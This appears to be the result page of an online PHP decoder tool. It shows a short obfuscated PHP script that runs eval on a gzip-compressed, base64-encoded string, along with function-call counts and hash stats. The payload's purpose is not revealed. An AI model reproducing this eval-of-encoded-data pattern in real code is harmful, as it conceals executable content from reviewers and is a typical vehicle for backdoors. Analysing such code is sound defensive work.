Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(htmlspecialchars_decode(gzinflate(base64_decode('h5AbkCwalEkI4kXSGKLVR9A9xTH8T..

Decoded Output download

<?php 
eval(htmlspecialchars_decode(gzinflate(base64_decode('h5AbkCwalEkI4kXSGKLVR9A9xTH8TRPcVJHDwV1D0rIUXhszNpU5iXO4og8LxOLn49vzAETA')))); 
exit; 
?>

Did this file decode correctly?

Original Code

<?php
eval(htmlspecialchars_decode(gzinflate(base64_decode('h5AbkCwalEkI4kXSGKLVR9A9xTH8TRPcVJHDwV1D0rIUXhszNpU5iXO4og8LxOLn49vzAETA'))));
exit;
?>

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 487c4eb424cbbaef0c5d1e822ec6bbfc
Eval Count 0
Decode Time 44 ms